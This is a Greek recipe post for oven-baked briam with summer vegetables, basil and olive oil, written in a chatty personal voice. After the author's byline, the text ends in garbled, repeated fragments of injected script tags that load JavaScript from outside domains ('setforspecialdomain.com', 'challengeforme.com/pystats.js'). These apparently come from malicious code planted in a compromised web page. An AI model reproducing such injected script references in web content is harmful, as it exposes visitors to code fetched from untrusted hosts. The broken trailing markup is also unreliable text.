Μπριάμ: δοξάζει το καλοκαίρι

briam-thumb-large

Μπριάμ στο φούρνο με καλοκαιρινά μυρωδικά.

(για το μεγάλο, βαθύ ταψί του φούρνου)

  • 4-5 μελιτζάνες τσακώνικες ή αν είναι φλάσκες σχετικά μικρές
  • 4-5 κολοκύθια μέτρια σε μέγεθος
  • 3-4 πατάτες κομμένες σε ροδέλες
  • 3-4 πιπεριές, πράσινες, κόκκινες, κίτρινες (ναι υπάρχουν και εγχώριες πολύχρωμες, όχι μόνο εξ Ολλανδίας)
  • 2-3 κρεμμύδια
  • 3-4 ντομάτες ώριμες
  • 1 κουτί ντοματάκια αποφλοιωμένα, ολόκληρα
  • 1 ματσάκι μαϊντανό ή
  • 1 ματσάκι βασιλικό (αυτή είναι η προσφιλής μου επιλογή, άλλωστε μαϊντανό έχουμε όλο το χρόνο)
  • αλάτι και πιπέρι
  • 1 ποτήρι ελαιόλαδο καλό

Να υπογραμμίσω εξαρχής ότι η επιτυχία εξαρτάται από την φρεσκάδα των υλικών; Περιττό νομίζω. Να εξηγήσω μόνο ότι οι ποσότητες είναι ενδεικτικές, ανάλογα με την ταψάρα που θα τα φιλοξενήσει. Ωστόσο, ας φροντίσουμε μια ισορροπία ανάμεσα στα υλικά: μπορεί τα μικρά παιδιά να επιπίπτουν επί των πατατών αγνοώντας π.χ. τις μελιτζάνες αλλά πατατομπριάμ δεν νοείται.

Ο φούρνος προθερμαίνεται στο 200 και η σχάρα στην οποία θα ακουμπήσει το ταψί είναι κάτω από τη μέση του φούρνου, σχετικά χαμηλά. Οι μελιτζάνες, κομμένες, βρίσκονται για μισή ώρα σε ένα σουρωτήρι, σκεπασμένες σε ένα πιάτο ανάποδα. Στη μισή ώρα τις ξεπλένουμε καλά και τις στεγνώνουμε ακόμη καλύτερα. Κομμένα σε ροδέλλες λεπτούτσικες κολοκυθάκια και κρεμμύδια. Πιο χοντρές ροδέλες, οι ντομάτες. Τα ντοματάκια της κονσέρβας ψιλοκομμένα, με τον ζωμό τους. Χωρίς τα σπόρια τους και κομμένες σε λωρίδες οι πιπεριές. Λοιπόν, άλλοι τα βάζουν ανά στρώσεις, όμως εγώ δεν μπορώ να διανοηθώ τάξη σε ένα φαγητό που λέγεται τουρλού.

Σε μεγάλη λεκάνη ανακατεύουμε με τα χέρια τα λαχανικά όλα με το λάδι και αλατοπιπερώνουμε χωρίς τσιγκουνιές. Τον βασιλικό ή μαϊντανό τον βάζουμε προς τη μέση του ψησίματος που θα ακολουθήσει.

Τα ξαπλώνουμε στο ταψί (ξαπλώσου στο ταξί, ξαπλώσου στο ταξί και πάμε να γλεντήσουμε σε φίνο μαγαζί) και τα φουρνίζουμε. Υπολογίζουμε δύο ώρες. Στα ¾ ανακατεύουμε για πρώτη φορά, στη 1:15 – 1:30 ώρα ξανά και ρίχνουμε και τα φυλλαράκια του βασιλικού. Μπόλικα. Τότε ανεβάζουμε και το ταψί στη μέση του φούρνου.

Το στοίχημα με το μπριάμ είναι να ‘ναι και ξεροψημένο και μελωμένο.

Της Αναστασίας Λαμπρία___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >